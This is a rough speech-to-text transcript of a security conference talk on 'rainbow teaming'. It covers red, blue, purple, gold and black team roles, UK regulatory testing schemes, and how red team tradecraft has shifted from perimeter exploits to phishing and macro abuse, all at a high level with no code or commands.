Taste the Rainbow

I work for NWR Enfield security we also go by The Branding of MWR Labs I'm actually a UK director but we do have a New York office out here um and as you can tell I sound very British I don't want to get too close to it okay it's like a stand-up show okay um I was like yeah so I am a director of the UK Professional Services Consulting division I have a long history of delivering technical penetration testing offensive type security and I specialize in an area that you guys are probably more familiar with or would call Red teaming except we call it something different and it's slightly different and that's kind of some of what I'm going to cover in this talk but basically what I largely do are what we coin is like simulated attacks and that's where we put an organization through a live fire drill of you know they think a real Attack is occurring and then we Benchmark how they react to it and we use it as a learning exercise you guys probably think because this is a red team but there's some nuances that will kind of cover and that's what I want to try and do is explain what rainbow teaming is now it's not a new term it's not something that's going to be adopted it's not something that I'm promoting but it kind of captures what I'm talking about um as we go through the talk as well we'll kind of get that covered off and I'm going to talk to you about some of our tradecraft that's mwr's experiences how we've approached red team type testing the types of tools we use the ttps we employ how they've matured over time what's prompted us to evolve in that way I.E what defensive challenges have we had to overcome so hopefully there's gonna be some takeaways for anyone in the room and by a show of hands how many sort of guys girls self-identify as red team is in here blue black gold purple so you're a full rainbow Team all right cool okay and also I'll wrap up the talk with some idea around uh defensive um tactics techniques that can be used to respond to some of the tradecraft that we're employing rainbow tailing okay um so what is it why is there no pink team okay uh everyone's seen the movie nobody wants to be in the pink team but I'm sure as we evolve even further maybe it'll be a pink team maybe it'll be a move I don't know but we seem to be putting them into uh buckets of color okay so black team this is brand new no one's actually using this term properly uh it's essentially because you guys have red teaming and in the UK we see red teaming as being largely physical so of like burglary scaling fences and stuff and we don't really do that in the UK it's not really the Forte many threat actors so um for reasons I'll explain a little bit later on but essentially this uh in the UK the bank of England uh have come up with a regulatory scheme for this type of assessment and they've put physical into a bucket called black teeny I'm sure you're all familiar with red teaming which is kind of the digital offense side of things which is you know you're phishing attacks and the like we break in with an implant or a piece of malware and then move to an objective blue often refers to the detection Response Team there may be separate teams but quite sort of bucketed into the same thing so those are guys running your sock looking for your alerts maybe you know doing a little bit more proactive activities it could be your instant responders the guys that you know boots on the ground when you know the proverbal hits the fan and you've got purple now I've heard people uh mainly in the states talk about purple teams as in uh you have a red team a blue team and a purple team now for me purple team is more conceptual it's a relationship it's a collaboration rather than a physical external entity to a red and blue team it should be purple team used as a descriptive language to articulate uh red and blue coming together for a common goal gol team now this throws most people people like what the hell's a gold team okay are you uh whether you're um in the red team or blue team and working within a business most organizations will have a group of people that come together in a sort of Crisis it doesn't have to be a digital breach it could be anything that that business is going through that it was it needs those sort of generals of the battlefield the guys that get come together and they're the ones that make the tough decisions they might end up sat in front of the press they might be having to you know deal with the digital breach or it could be something else it could be a toxic spell whatever so a gold team is is uh that group and putting them through their paces and testing those now how does it all come about well I'm a little bit old maybe not as old as some in the room but definitely older than others and I've been in the industry within the UK for quite a while and what I've seen is from the very beginning very cowboy-like behavior is displayed by various different pen test firms and organizations that wanted to procure our services that were quite relaxed about them as well in the early days it was kind of okay you guys are the hackers come and break in put a file on my desktop and then I believe that you're any good then over time that kind of matured slightly people either because they started to employ pen testers that crash networks brought down boxes and then people panicked and cried and screamed Etc and the reaction was okay then we can't allow this free reign to continue we need to test with very narrow Scopes control the risk and it became very compliance driven Almost Boring in cases definitely not holistic um but then we've kind of um come round full circle now is more and more organizations have been breached you've got a lot of threat intelligence terms out there they're releasing information about adaptive and capable uh real nation state threats as well as criminal groups that really don't operate like pen testers and obviously operate without any scope so the industry or organizations that are looking to defend themselves against these types of attacks have recognized that a pen test just isn't going to cut it and now it's back to right come at me with all you've got let me see whilst the industry has matured on both sides organizations recognizing that they need to take cyber security that much more serious and vendors out there have also matured and used robust methodologies Advanced trade craft and tooling Etc this has been spurred on at least in the UK where we're really into our regulation by Regulators so there are various schemes out there government and Commercial and financial and other sectors that demand a certain level of or have an expectation that certain organizations will have gone through an advanced level of cyber security assurance you can rubbish it or think what you want about certain schemes out there PCI being a good example but what they are great for has been a catalyst to get a lot of organizations to mature rapidly and start to at least think about cyber security outside of just a very narrow scope to pen test the main ones for me that I come across in the UK are the check scheme Crest Bank of England sea best which is a regulatory framework for testing financial institutions resilience to capable attacks and breaches and that's gone over into places like Singapore under the icast scheme and Hong Kong sorry Hong Kong under icast Singapore's launches soon Kuala Lumpur and I know the US are looking at this as well so what these schemes have done is try to map out a methodology for delivering this type of test again what you guys would call Red teaming what I would call targeted attack simulations but hopefully we'll find a common lexicon it some way but there's been this attempt to classify it and that's why we've ended up with all the lovely colors but what we've also had is vendors coming along with their own terminology to confuse it slightly as well as you can see we've had full spectrum cyber targeted attack simulations I mean that's one of ours full spectrum attack simulation cyber cyber site Etc and if you can imagine that you or an organization looking to procure some level of assurance against this sort of stuff and you're going out trying to buy this the language is so confusing how do you know what you're getting is that the same as that is that something different is that better is that worse so there has to be a common lexicon now I do not Advocate that is rainbow teaming that really is just me taking the piss a little but we do have to come up with something at some stage otherwise we'll end up with rainbow team in or full spectrum cyber I personally don't care what it is called just that it's done properly and for me for something like this to be done properly it means going into a business speaking to the board about what their real concerns are from a cyber perspective I.E what threats do they think they're facing how resilient do they think they are what outcomes are they looking to to get from such an engagement and then I work my way backwards and design that program and it becomes a cyber security program which doesn't sound as sexy as threat emulation simulation full spectrum cyber or rainbow teaming but it doesn't really matter it's what resonates with the board now the problem is the colors at least do resonate with many boards at the moment obviously probably not gold and black team out here yet but eventually we're moving in that direction so what do these things mean to me okay and how do I go about one of these types of Assessments how would I build it out now typically when I get engaged with um a client that wants to prepare our services a lot of people want a red team because red team's super hot and sexy and everyone knows what a red team is and most board members have read it and some in-flight magazine and they come back to their business going I want a red team get me a red team we need a red team and then no one challenges them and goes okay we'll go get your red team but unless you've actually got a benchmark of your own defensive capabilities against some kind of measurable standard how do you know how are you going to measure the success criteria of a red team a red team isn't there just to come along and slap you in the face and say aren't we clever it's supposed to be about helping an organization build up their defenses train their people and make them more resilient to attack or at least assist them with a detection response capabilities so if you're going to do that you need to measure you only had to have some kind of starting point and if you don't have that starting point what are you really handing that cash over for so my advice would be for any organization if you don't have that Benchmark to start off with go and get it and there's various ways to go and get it you can use your internal teams you can look at Frameworks such as attack which is a great Matrix a catalog that contains lots of different ttps in a matrix format and they've even extrapolate it down so you can emulate particular particular threat actors from TR reports that are out there and all you're really doing is making sure that all that security spend that you've handed over to various vendors for their little blinking boxes are doing what they should do and it's best example is Av okay everyone rubbish is on AV but at least it catches a lot of crap and you don't want that crap on your network but at the same time you don't want to be caught out by that crap so if you've got AV you just want to make sure that it's working it's ticking along you don't put a lot of effort into it so run some automated test cases Benchmark that what you've bought is doing what it should do and then at least if you use something like attack you can get a gap analysis you know you're picking up these certain things you're not picking up those certain things you can go away and tweak those yourself or then you can start thinking about more advanced things depending on your level of maturity now internal MWR we have our own tooling we have something called attack Sim where we can run automated playbooks and different trycraft and different sort of attack paths through it and we can Benchmark that detection response capability and help tweak it Caldera is an automated proof of concept very much in beta but it's available from miter as well and then you can roll your own like I said that framework is there those ttps every command you need to run you know whatever scripting language you like you can just script that up run it even if you have to manually type it in and just see the right alerts to the fire okay then I would move on to what you guys probably call a red team and I would call an attack simulation which is basically you want to put Blue Team through a live fire exercise with a red team but we also drop in some of their own blue tea guys that will sit with the client's blue team to Benchmark their abilities as they go they can either train them and tutor them along the way by steering them in the right direction or they can just sit back and observe and get a true measure and produce that Gap analysis and also we embed some red teamers to give that purple team element either as part of the engagement or at the very least at the end of the engagement our red team go in share all our tradecraft all the tools the boat attack that's what we did why we did it when we did it Etc and we're open to full interrogation by The Blue Team so they can fully understand the attack and then we might re-run various elements of it as well because it's a learning exercise that's where the real fun starts and that's where the real value is the value doesn't come by steaming in and smashing all the things and getting domain admin the value comes from showing how we did that how we operated within that environment why we did what we did when we did it how we reacted how we adapted Etc ah the core of this is that red is there to skill up blue not to prove a point or have an ego we also like to include the gold team element it might be during the engagement you can get that crisis management team together if not once you've finished blue team have had their chance interrogated you gone through it all all the playbooks are open then do a tabletop exercise for that crisis management team re-run through the exercise using that as a Playbook and seeing how people react how they go through it there will not be any wrong answers you just want to see how people react under that pressure under what would be a real attack with contextualization against their own environment so that's kind of rainbow teaming but don't call it rainbow teaming we've got to come up with a new name that resonates now the rest of uh this talk now I want to walk through some of our troycraft how we've evolved it over time and some um defensive tips as well as we go now I've personally over the past three four five years something like that worked with a team of guys where we've robbed a lot of banks gone into Minds done crazy things with you know crazy computer systems uh casinos all sorts of different places we've been into and over these years what we've seen especially with the clients that we work most often with and go around the circle is that getting mature and mature all the time I'm going to talk about what I've come across and what my teams come across from my perspective some of this might be shared views you guys might have had similar experiences but what I do is um I talk to a lot of others in the industry that I've got relationships with guys at NCC guys uh context and you know context but you want other guys I know I think um MD SEC they're a UK firm uh you know you guys probably familiar with guys over at specs where Arts used to be at various group and we share tools we share traycraft stories over beers Etc the feedback I've had is that these are shared experiences so hopefully you guys might get some resonance from them as well I'm going to be talking at a high level to get through it all but if anyone wants to grab me and go into detail afterwards you can buy me a beer or I'll buy you a beer it doesn't really matter I'm quite happy to talk about this stuff okay so very quick history lessons we go through so we used to start off six seven eight years ago where to get into an organization you just have to have a little poke at the perimeter there was always a weak service an API and app or something it'll drop you into a shell you could reverse proxy you could use all your pen test tools it really wasn't hard and then you were straight into the environment and Away you went no one was really defending no one was really looking so in and out easy days aren't we clever then things got that little bit harder Defenders started going I don't want this to be as easy as it is anymore started plugging those holes getting web application firewalls you know all the usual stuff they went to the perimeter and locked it down so we have to think about okay let's go around the perimeter what can we do then and this is you know the age of fishing we shifted over to basically emailing the meat suits sat at the end of the computer who are easy to trick and we sent them attachments or links to websites that pointed to something as simple as Metasploit autopone where it just ran through and goes what software you're running there's an exploit great away we go and again you're using your pen test tools there was nothing big and clever about that but it worked a lot again we felt like super ninja hackers but really were we all it took from the defensive team to respond to this sort of stuff was to start patching the desktops the browser plugins okay there's a lot of effort made by various browser vendors and plug-in vendors to do code a little bit more securely and plug this down but it was generally we were using not zero days we're using patchable vulnerabilities months after patches have been available so this was like security hygiene they just had to get right a lot of those holes got closed the offenses went up shiny boxes came out that would detect this type of attacks they're easily signatured so if you were sending through a malicious PDF then someone somewhere had a signature part it was either in AV it was in a male Gateway scanner same thing when you were visiting a site that tried to trigger some sort of browser exploit they all had similar patterns people didn't really customize them they're all coming out of met exploit The Defenders had access to the same tooling so it was easy to signature and sell you a box that could detect or block that so we would defeat it our fishes were getting caught our exploits weren't working we went from super ninja hackers to basically feeling quite crap we didn't have any shells and it would be quite an embarrassing thing to turn around to your client and say no couldn't get in because all your flashy boxes stopped us so in order to react we moved to more social engineering focused things if our exploits were getting caught because they're easily signatured that shellco we keep reusing from Metasploit is now famous Etc then let's just abuse functionality in common applications on the desktop and I'm sure a lot of you are familiar with using word macros XL DDE PDF JavaScript Etc all of them have built-in functionality that allows you to execute commands or some level of code execution or built-in scripting languages that can be abused so all we were doing was abusing that feature and a little bit of trickery not trying that hard to get users to click on stuff that's why it was still usable but less so we were looking at different tooling Powershell was becoming the thing everyone was you know getting super excited about this powerful scripting language that was available in the windows world for post exploitation um small scriplets could be dropped to disk you could customize them easily it was fun times